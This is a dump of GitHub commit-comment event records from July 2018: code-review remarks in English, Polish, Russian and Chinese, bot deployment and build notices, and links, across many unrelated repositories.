{"id":"8028608210","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29858568,"position":65,"line":67,"path":"src/scripts/slider.js","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T13:29:59Z","updated_at":"2018-07-27T13:29:59Z","author_association":"NONE","body":"Sformatuj kod.\r\nUsuń `Magic String`"}},"created_at":"2018-07-27T13:29:59Z"}
{"id":"8028609326","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29858572,"position":null,"line":null,"path":null,"commit_id":"4b45181656db870940dd177825ec2a7a4dc120ec","created_at":"2018-07-27T13:30:13Z","updated_at":"2018-07-27T13:30:13Z","author_association":"COLLABORATOR","body":"I fixed the PEP8 and non-ASCII issues. The Python 3 issue looks like you are using the extension built for Python 2, Python C extensions does work across versions (even minor ones) and should be compiled against each version separately."}},"created_at":"2018-07-27T13:30:13Z"}
{"id":"8028610502","type":"CommitCommentEvent","actor":{"login":"sampaccoud"},"repo":{"name":"openfun/marsha"},"payload":{"comment":{"id":29858579,"position":35,"line":81,"path":"marsha/lti_provider/views.py","commit_id":"34229e50abe1f170a43ccbc6b7eca2fa4b75f686","created_at":"2018-07-27T13:30:24Z","updated_at":"2018-07-27T13:30:24Z","author_association":"CONTRIBUTOR","body":"FYI wrapping big blocks of codes in try/except is a bad practice in Python. We should only include in the \"try\" the clause that we expect to raise a BaseException."}},"created_at":"2018-07-27T13:30:24Z"}
{"id":"8028612801","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29858581,"position":29,"line":25,"path":"src/scripts/slider.js","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T13:30:50Z","updated_at":"2018-07-27T13:30:50Z","author_association":"NONE","body":"Id? Okey, czyli nie dajesz możliwości osadzenia komponentu kilka razy?"}},"created_at":"2018-07-27T13:30:50Z"}
{"id":"8028619723","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29858596,"position":8,"line":7,"path":"src/scripts/slider.js","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T13:32:10Z","updated_at":"2018-07-27T13:32:10Z","author_association":"NONE","body":"Brakuje tu funkcji `createUniqueId`...\r\nNie używajmy `Magic Number`ów takich jak 1000.\r\nMoże skonfiguruj sobie ESLinta, to zobaczysz o czym mówię :) "}},"created_at":"2018-07-27T13:32:10Z"}
{"id":"8028620853","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29858598,"position":null,"line":null,"path":null,"commit_id":"be99e75b6c6842a058e723bdb6b8f65ea3a986c9","created_at":"2018-07-27T13:32:22Z","updated_at":"2018-07-27T13:32:22Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [terminusph](https://terminusph-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/terminus/install](https://terminusph-static-docs.pantheonsite.io/docs/terminus/install)\n"}},"created_at":"2018-07-27T13:32:22Z"}
{"id":"8028622263","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29858602,"position":8,"line":19,"path":"src/scripts/index.js","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T13:32:38Z","updated_at":"2018-07-27T13:32:38Z","author_association":"NONE","body":"Ułóż elementy pionowo, zamiast poziomo"}},"created_at":"2018-07-27T13:32:38Z"}
{"id":"8028624276","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29858604,"position":19,"line":12,"path":"src/index.html","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T13:33:00Z","updated_at":"2018-07-27T13:33:00Z","author_association":"NONE","body":"id=slider a nad nim class=slider ?! coś mi tu śmierdzi"}},"created_at":"2018-07-27T13:33:00Z"}
{"id":"8028624716","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29858606,"position":null,"line":null,"path":null,"commit_id":"9580d99e23207bc08df781c4b04e4d5028c482b1","created_at":"2018-07-27T13:33:06Z","updated_at":"2018-07-27T13:33:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Leland 94 model](https://trello.com/c/fC10xWMf/26-leland-94-model)"}},"created_at":"2018-07-27T13:33:06Z"}
{"id":"8028630493","type":"CommitCommentEvent","actor":{"login":"tony-clarke-amdocs"},"repo":{"name":"spring-cloud/spring-cloud-gateway"},"payload":{"comment":{"id":29858613,"position":null,"line":null,"path":null,"commit_id":"972c3710ee5a1decc4162bafedeee06ffbc9ec68","created_at":"2018-07-27T13:34:15Z","updated_at":"2018-07-27T13:34:15Z","author_association":"CONTRIBUTOR","body":"@ByJacob @ryanjbaxter I will submit a PR to fix this"}},"created_at":"2018-07-27T13:34:15Z"}
{"id":"8028637411","type":"CommitCommentEvent","actor":{"login":"walkermatt"},"repo":{"name":"jonataswalker/ol-geocoder"},"payload":{"comment":{"id":29858631,"position":null,"line":null,"path":null,"commit_id":"552d87f5ad77292c0c7a302fad5b4820db5f22c2","created_at":"2018-07-27T13:35:35Z","updated_at":"2018-07-27T13:35:35Z","author_association":"COLLABORATOR","body":"Great, thanks :+1: \r\n\r\nBTW I've been using [BrowserStack](https://browserstack.com/test-on-microsoft-edge-browser#live-cloud) to test Edge together with [`ngrok`](https://ngrok.com/) to expose my local working copy of the repo."}},"created_at":"2018-07-27T13:35:35Z"}
{"id":"8028640425","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29858634,"position":null,"line":null,"path":null,"commit_id":"5b4e13bfcccf35181542435f2090481d3a5cd29e","created_at":"2018-07-27T13:36:12Z","updated_at":"2018-07-27T13:36:12Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/problems-with-the-top-menu/93286/4\n"}},"created_at":"2018-07-27T13:36:12Z"}
{"id":"8028648423","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858647,"position":42,"line":32,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:37:42Z","updated_at":"2018-07-27T13:37:42Z","author_association":"NONE","body":"в задании:\r\n\"Может возвращать список поездов на станции по типу (см. ниже): кол-во грузовых, пассажирских\"\r\nне выводить в консоль, а **возвращать**\r\nтвой метод **выводит**\r\n\r\n(метод `puts` \"выводит информацию на печать в консоли\")"}},"created_at":"2018-07-27T13:37:42Z"}
{"id":"8028650800","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29858652,"position":87,"line":126,"path":"api/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T13:38:09Z","updated_at":"2018-07-27T13:38:09Z","author_association":"MEMBER","body":"shouldn't we be using a manual list for self.viewable_by_anon of the videos in the fixtures that are public? if we use the same method to do the test and retrieve the list to check the test, we are not really testing that it works"}},"created_at":"2018-07-27T13:38:09Z"}
{"id":"8028651817","type":"CommitCommentEvent","actor":{"login":"slide"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29858654,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T13:38:20Z","updated_at":"2018-07-27T13:38:20Z","author_association":"MEMBER","body":"For steps, the same syntax should work as far as I know. I don't know of any special requirements for plugins to add support for declarative syntax, so it should work for both declarative and scripted."}},"created_at":"2018-07-27T13:38:20Z"}
{"id":"8028657019","type":"CommitCommentEvent","actor":{"login":"jarped"},"repo":{"name":"Artsdatabanken/ratatouille"},"payload":{"comment":{"id":29858668,"position":null,"line":null,"path":null,"commit_id":"7d55e2c210d613fa882be46eb0449731d3e2c87b","created_at":"2018-07-27T13:39:19Z","updated_at":"2018-07-27T13:39:19Z","author_association":"CONTRIBUTOR","body":"Fetched from https://openmaptiles.org/docs/website/tangram/"}},"created_at":"2018-07-27T13:39:19Z"}
{"id":"8028659256","type":"CommitCommentEvent","actor":{"login":"jarped"},"repo":{"name":"Artsdatabanken/ratatouille"},"payload":{"comment":{"id":29858669,"position":null,"line":null,"path":null,"commit_id":"7d55e2c210d613fa882be46eb0449731d3e2c87b","created_at":"2018-07-27T13:39:41Z","updated_at":"2018-07-27T13:39:41Z","author_association":"CONTRIBUTOR","body":"Speifically https://gist.githubusercontent.com/petrsloup/27ee74e2cdebc7ac72129da3a89a440f/raw/19385aae40b9d0ba0a6c0ef1c3afe87f2743d54d/gistfile1.txt"}},"created_at":"2018-07-27T13:39:41Z"}
{"id":"8028663834","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858681,"position":50,"line":38,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:40:32Z","updated_at":"2018-07-27T13:40:32Z","author_association":"NONE","body":"1. этот метод, как и предыдущий выводит, вместо возврата\r\n2. довольно сложный код, из-за использования хеша для хранения поездов, с массивом можно было бы все решить заметно проще"}},"created_at":"2018-07-27T13:40:32Z"}
{"id":"8028678651","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29858706,"position":105,"line":137,"path":"api/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T13:43:05Z","updated_at":"2018-07-27T13:43:05Z","author_association":"MEMBER","body":"see my same comment above"}},"created_at":"2018-07-27T13:43:05Z"}
{"id":"8028682245","type":"CommitCommentEvent","actor":{"login":"backamblock"},"repo":{"name":"PrestaShop/classic-rocket"},"payload":{"comment":{"id":29858717,"position":null,"line":null,"path":null,"commit_id":"a7dd12da4ab35dd8dd42f0ec3335b43e81fa537f","created_at":"2018-07-27T13:43:45Z","updated_at":"2018-07-27T13:43:45Z","author_association":"NONE","body":"lol, you are so fast! i just downloaded and installed the previous release, reload the site and boom, new release haha 😁 👍 🥇 "}},"created_at":"2018-07-27T13:43:45Z"}
{"id":"8028682410","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29858718,"position":null,"line":null,"path":null,"commit_id":"b782065fb877c919e1fa797312e52a5bd42deb48","created_at":"2018-07-27T13:43:47Z","updated_at":"2018-07-27T13:43:47Z","author_association":"OWNER","body":"Post.php - Add missing method getAvailableStatuses()\r\n1 exception(s):\r\nException #0 (Exception): Warning: Invalid argument supplied for foreach() in /home/staging/demoTujar/app/code/Kvr/Blog/Model/Post/Source/IsActive.php on line 30"}},"created_at":"2018-07-27T13:43:47Z"}
{"id":"8028684967","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29858724,"position":null,"line":null,"path":null,"commit_id":"b782065fb877c919e1fa797312e52a5bd42deb48","created_at":"2018-07-27T13:44:16Z","updated_at":"2018-07-27T13:44:16Z","author_association":"OWNER","body":"Class Kvr\\Blog\\Model\\ResourceModel\\Post\\Grid\\Collection does not exist\r\nRemove \"Ashsmith\" with \"Kvr\" - di.xml\r\n\r\nAdd New Post\r\nSQLSTATE[42S02]: Base table or view not found: 1146 Table 'devTujar.kvr_blog_post' doesn't exist, query was: SELECT COUNT(*) FROM `kvr_blog_post` AS `main_table`\r\n\r\nKvr_blog_post - di.xml line 22"}},"created_at":"2018-07-27T13:44:16Z"}
{"id":"8028685342","type":"CommitCommentEvent","actor":{"login":"baishuo"},"repo":{"name":"hugegraph/hugegraph"},"payload":{"comment":{"id":29858726,"position":null,"line":null,"path":null,"commit_id":"c3c2def55ebf729f81ebc33d538d9d4aaa26b045","created_at":"2018-07-27T13:44:20Z","updated_at":"2018-07-27T13:44:20Z","author_association":"NONE","body":"希望能够尽快和hugegraph项目组取得联系，谢谢。13261723178 （微信同）"}},"created_at":"2018-07-27T13:44:20Z"}
{"id":"8028686567","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29858727,"position":null,"line":null,"path":null,"commit_id":"f0e4edb615e569a26509aad850db6f771a187488","created_at":"2018-07-27T13:44:33Z","updated_at":"2018-07-27T13:44:33Z","author_association":"COLLABORATOR","body":"- New action types: `OVERLAY_INITIALIZE`, `OVERLAY_CONNECTED`\r\n- New `OverlayWidget`: `TEXT`"}},"created_at":"2018-07-27T13:44:33Z"}
{"id":"8028686583","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29858728,"position":184,"line":186,"path":"api/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T13:44:33Z","updated_at":"2018-07-27T13:44:33Z","author_association":"MEMBER","body":"?"}},"created_at":"2018-07-27T13:44:33Z"}
{"id":"8028686779","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29858730,"position":null,"line":null,"path":null,"commit_id":"8697dc3688b379811e4dc1cd6e6311259b401d22","created_at":"2018-07-27T13:44:35Z","updated_at":"2018-07-27T13:44:35Z","author_association":"COLLABORATOR","body":"- Action types removed: `OVERLAY_INITIALIZE`, `OVERLAY_CONNECTED`"}},"created_at":"2018-07-27T13:44:35Z"}
{"id":"8028687555","type":"CommitCommentEvent","actor":{"login":"cpinter"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29858734,"position":5,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"673acf9fc06298c7100ee5947fc207e67a17bbea","created_at":"2018-07-27T13:44:43Z","updated_at":"2018-07-27T13:44:43Z","author_association":"CONTRIBUTOR","body":"I wasn't aware of the tooltip. If that was the important part then maybe you should have added the comment there, not here..."}},"created_at":"2018-07-27T13:44:43Z"}
{"id":"8028688478","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29858736,"position":null,"line":null,"path":null,"commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T13:44:52Z","updated_at":"2018-07-27T13:44:52Z","author_association":"OWNER","body":"https://www.ashsmith.io/magento2/module-from-scratch-part-5-adminhtml/"}},"created_at":"2018-07-27T13:44:52Z"}
{"id":"8028688497","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29858737,"position":null,"line":null,"path":null,"commit_id":"e7483f278452884a3fd6db391c8e6a13f3f93cad","created_at":"2018-07-27T13:44:52Z","updated_at":"2018-07-27T13:44:52Z","author_association":"OWNER","body":"Given the failed simplification of both HinderPassedPawn and Overload and HinderPassedPawn already committed (#1710):\r\nhttps://github.com/protonspring/Stockfish/compare/2660a91...68c34ca\r\n\r\nI did not plan to submit a PR.  should I do it anyway?"}},"created_at":"2018-07-27T13:44:52Z"}
{"id":"8028694611","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"QuantStack/xeus"},"payload":{"comment":{"id":29858750,"position":4,"line":105,"path":"CMakeLists.txt","commit_id":"74e5bd66d785866629519ccef5073095a08421fc","created_at":"2018-07-27T13:45:58Z","updated_at":"2018-07-27T13:45:58Z","author_association":"NONE","body":"Does XEUSCLING_TARGET exist here? I don't see it in the repo."}},"created_at":"2018-07-27T13:45:58Z"}
{"id":"8028694966","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29858752,"position":null,"line":null,"path":null,"commit_id":"e7483f278452884a3fd6db391c8e6a13f3f93cad","created_at":"2018-07-27T13:46:02Z","updated_at":"2018-07-27T13:46:02Z","author_association":"OWNER","body":"http://tests.stockfishchess.org/tests/view/5b5acc8f0ebc5902bdb8cf8d"}},"created_at":"2018-07-27T13:46:02Z"}
{"id":"8028698889","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29858765,"position":30,"line":116,"path":"api/views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T13:46:47Z","updated_at":"2018-07-27T13:46:47Z","author_association":"MEMBER","body":"nice improvement"}},"created_at":"2018-07-27T13:46:47Z"}
{"id":"8028704981","type":"CommitCommentEvent","actor":{"login":"RafaSuquinahua"},"repo":{"name":"diegorobalino16/Sistesmas_Distribuidos"},"payload":{"comment":{"id":29858774,"position":3,"line":3,"path":"README.md","commit_id":"cc3ca1cc30d08da0a6eb24e51dfd467ed014ba9d","created_at":"2018-07-27T13:47:54Z","updated_at":"2018-07-27T13:47:54Z","author_association":"COLLABORATOR","body":"Integrantes:\r\nGabriel Arauz\r\nRafael Suquinahua\r\nDiego Robalino"}},"created_at":"2018-07-27T13:47:54Z"}
{"id":"8028710100","type":"CommitCommentEvent","actor":{"login":"RafaSuquinahua"},"repo":{"name":"diegorobalino16/Sistesmas_Distribuidos"},"payload":{"comment":{"id":29858781,"position":3,"line":3,"path":"README.md","commit_id":"cc3ca1cc30d08da0a6eb24e51dfd467ed014ba9d","created_at":"2018-07-27T13:48:51Z","updated_at":"2018-07-27T13:48:51Z","author_association":"COLLABORATOR","body":"Integrantes:\r\nGabriel Arauz\r\nRafael Suquinahua\r\nDiego Robalino"}},"created_at":"2018-07-27T13:48:51Z"}
{"id":"8028714665","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/conda-forge-webservices"},"payload":{"comment":{"id":29858793,"position":null,"line":null,"path":null,"commit_id":"b497e0914e7c803f69ca460b6fd1d6bc3d15156d","created_at":"2018-07-27T13:49:41Z","updated_at":"2018-07-27T13:49:41Z","author_association":"MEMBER","body":"FWIW it's also possible to manually rebuild on Heroku (even with automatic builds setup). Though empty commits are also fine if you would like to help keep a public record of rebuilds."}},"created_at":"2018-07-27T13:49:41Z"}
{"id":"8028719170","type":"CommitCommentEvent","actor":{"login":"bjhargrave"},"repo":{"name":"ScienceCityJena/bnd"},"payload":{"comment":{"id":29858798,"position":16,"line":1285,"path":"aQute.libg/src/aQute/lib/io/IO.java","commit_id":"738c4c5fcec1c40b96ca4d18fdfcb6945f48b333","created_at":"2018-07-27T13:50:33Z","updated_at":"2018-07-27T13:50:33Z","author_association":"NONE","body":"See https://github.com/bndtools/bnd/blob/master/maven/bnd-shared-maven-lib/src/main/java/aQute/bnd/maven/lib/configuration/FileTree.java for a better implementation that exploits AntGlob expressions for the include and exclude expressions. Perhaps that class can be copied (and modified to remove maven types) to a new package in the aQute.libg project."}},"created_at":"2018-07-27T13:50:33Z"}
{"id":"8028723784","type":"CommitCommentEvent","actor":{"login":"metamasterplay"},"repo":{"name":"metamasterplay/odoo-1"},"payload":{"comment":{"id":29858811,"position":143,"line":111,"path":"MoleQla/Models/revision.py","commit_id":"a8a5c760d456d262c41755065038aa174ac0391f","created_at":"2018-07-27T13:51:24Z","updated_at":"2018-07-27T13:51:24Z","author_association":"OWNER","body":"Yes you can close python classes only with indentations"}},"created_at":"2018-07-27T13:51:24Z"}
{"id":"8028726858","type":"CommitCommentEvent","actor":{"login":"bjhargrave"},"repo":{"name":"ScienceCityJena/bnd"},"payload":{"comment":{"id":29858816,"position":16,"line":1285,"path":"aQute.libg/src/aQute/lib/io/IO.java","commit_id":"738c4c5fcec1c40b96ca4d18fdfcb6945f48b333","created_at":"2018-07-27T13:51:59Z","updated_at":"2018-07-27T13:51:59Z","author_association":"NONE","body":"And you should use this new class (and AntGlob expressions for include/exclude) for the remainder of the changes."}},"created_at":"2018-07-27T13:51:59Z"}
{"id":"8028727956","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29858820,"position":9,"line":41,"path":"app.js","commit_id":"c89ad7e0ba8c6636e20c644e2fecea59bbad49a1","created_at":"2018-07-27T13:52:11Z","updated_at":"2018-07-27T13:52:11Z","author_association":"COLLABORATOR","body":"do not listen to uncaughException"}},"created_at":"2018-07-27T13:52:11Z"}
{"id":"8028730548","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29858826,"position":9,"line":41,"path":"app.js","commit_id":"c89ad7e0ba8c6636e20c644e2fecea59bbad49a1","created_at":"2018-07-27T13:52:39Z","updated_at":"2018-07-27T13:52:39Z","author_association":"COLLABORATOR","body":"also https://github.com/getsentry/raven-node/blob/master/lib/client.js#L119"}},"created_at":"2018-07-27T13:52:39Z"}
{"id":"8028734720","type":"CommitCommentEvent","actor":{"login":"AdityaTD"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29858833,"position":9,"line":41,"path":"app.js","commit_id":"c89ad7e0ba8c6636e20c644e2fecea59bbad49a1","created_at":"2018-07-27T13:53:26Z","updated_at":"2018-07-27T13:53:26Z","author_association":"OWNER","body":"Oh... okay"}},"created_at":"2018-07-27T13:53:26Z"}
{"id":"8028737495","type":"CommitCommentEvent","actor":{"login":"ryanjbaxter"},"repo":{"name":"spring-cloud/spring-cloud-gateway"},"payload":{"comment":{"id":29858837,"position":null,"line":null,"path":null,"commit_id":"972c3710ee5a1decc4162bafedeee06ffbc9ec68","created_at":"2018-07-27T13:53:56Z","updated_at":"2018-07-27T13:53:56Z","author_association":"CONTRIBUTOR","body":"Thanks I was just about to work on this!\r\n\r\n@ByJacob in the future please open an issue instead of commenting on a commit."}},"created_at":"2018-07-27T13:53:56Z"}
{"id":"8028739804","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858841,"position":30,"line":26,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:54:22Z","updated_at":"2018-07-27T13:54:22Z","author_association":"NONE","body":"лучше конечно название более понятное, более соответстующее контексту\r\nк примеру `send_train`"}},"created_at":"2018-07-27T13:54:22Z"}
{"id":"8028741902","type":"CommitCommentEvent","actor":{"login":"nadimalam"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29858846,"position":null,"line":null,"path":null,"commit_id":"1db4f0cd8d8099451731bf41c4b67f776a90d231","created_at":"2018-07-27T13:54:46Z","updated_at":"2018-07-27T13:54:46Z","author_association":"NONE","body":"Did i miss some step? I did it just for NumbersFragment, changed the activity file also but now when i run the app and click on Numbers all i see is a white screen that says: \"Hello blank fragment\". What am i missing?\r\n\r\nthanks"}},"created_at":"2018-07-27T13:54:46Z"}
{"id":"8028742197","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29858847,"position":15,"line":68,"path":"frontend/src/css/Login.styl","commit_id":"245db7c5c88fd7d13d07aaf0ebf5bba60e5ee52d","created_at":"2018-07-27T13:54:49Z","updated_at":"2018-07-27T13:54:49Z","author_association":"COLLABORATOR","body":"dont use top 95%\r\nprefere bottom 5%"}},"created_at":"2018-07-27T13:54:49Z"}
{"id":"8028742698","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858849,"position":25,"line":21,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:54:55Z","updated_at":"2018-07-27T13:54:55Z","author_association":"NONE","body":"название я бы порекомендовал изменить на что-то типа `accept_train`"}},"created_at":"2018-07-27T13:54:55Z"}
{"id":"8028748021","type":"CommitCommentEvent","actor":{"login":"sli921"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29858858,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T13:55:54Z","updated_at":"2018-07-27T13:55:54Z","author_association":"NONE","body":"Thanks for clarifying. I've made a mistake."}},"created_at":"2018-07-27T13:55:54Z"}
{"id":"8028749185","type":"CommitCommentEvent","actor":{"login":"hereisalexius"},"repo":{"name":"hereisalexius/member-service"},"payload":{"comment":{"id":29858860,"position":null,"line":null,"path":null,"commit_id":"148bf83ffee1804921933166a57e48bb8cb61b7f","created_at":"2018-07-27T13:56:08Z","updated_at":"2018-07-27T13:56:08Z","author_association":"OWNER","body":"fast and furious 3d"}},"created_at":"2018-07-27T13:56:08Z"}
{"id":"8028754588","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29858874,"position":19,"line":40,"path":"frontend_lib/src/component/Timeline/Comment.jsx","commit_id":"66d4b29b77f50794f2000a143546c7fff8ccf84a","created_at":"2018-07-27T13:57:07Z","updated_at":"2018-07-27T13:57:07Z","author_association":"COLLABORATOR","body":"dangerouslySetInnerHTML was here for a reason.\r\nFor instance, I dont think your code cannot display comment created with wysiwyg.\r\nTest it."}},"created_at":"2018-07-27T13:57:07Z"}
{"id":"8028758737","type":"CommitCommentEvent","actor":{"login":"ShingekiNoRex"},"repo":{"name":"Grover-c13/Smod2"},"payload":{"comment":{"id":29858883,"position":null,"line":null,"path":null,"commit_id":"fbe191d3e6a5d79b8f09bdb3d5ecb72303439952","created_at":"2018-07-27T13:57:50Z","updated_at":"2018-07-27T13:57:50Z","author_association":"COLLABORATOR","body":"If a player is dead, you can infect him with this function. so that he can be re-animated by SCP-049.\r\nBTW it doesn't trigger OnInfect event."}},"created_at":"2018-07-27T13:57:50Z"}
{"id":"8028771138","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"TheFixerDevelopment/TeaSpoon"},"payload":{"comment":{"id":29858899,"position":null,"line":null,"path":null,"commit_id":"ad96bfbda6e0f2a107c39280fcf25b77411652fe","created_at":"2018-07-27T14:00:07Z","updated_at":"2018-07-27T14:00:07Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user\nTheFixerDevelopment, who has created 60 Poggit-CI builds in the past 168\nhours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/TheFixerDevelopment/TeaSpoon/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `5cab6ac6-91a5-11e8-8bbc-14cf8c2314b7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-27T14:00:07Z"}
{"id":"8028774946","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29858914,"position":27,"line":66,"path":"frontend/src/container/Sidebar.jsx","commit_id":"6f30d2aef5ca4b05fd68c33b6ea173efac92532c","created_at":"2018-07-27T14:00:45Z","updated_at":"2018-07-27T14:00:45Z","author_association":"COLLABORATOR","body":"bad class name.\r\nsidebar__wrapper would mean this div is around the entire sidebar, which it's not"}},"created_at":"2018-07-27T14:00:45Z"}
{"id":"8028777700","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig"},"payload":{"comment":{"id":29858925,"position":22,"line":85,"path":"apertium-uig.uig.twol","commit_id":"730b939a727d9f75999e3ffb1c4275d500a67b35","created_at":"2018-07-27T14:01:15Z","updated_at":"2018-07-27T14:01:15Z","author_association":"CONTRIBUTOR","body":"Is there anything else this becomes?"}},"created_at":"2018-07-27T14:01:15Z"}
{"id":"8028781409","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29858932,"position":null,"line":null,"path":null,"commit_id":"0cd31e635da7d044fc73e7c307aa38023e994b87","created_at":"2018-07-27T14:01:54Z","updated_at":"2018-07-27T14:01:54Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-60](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-60).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-60-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T14:01:54Z"}
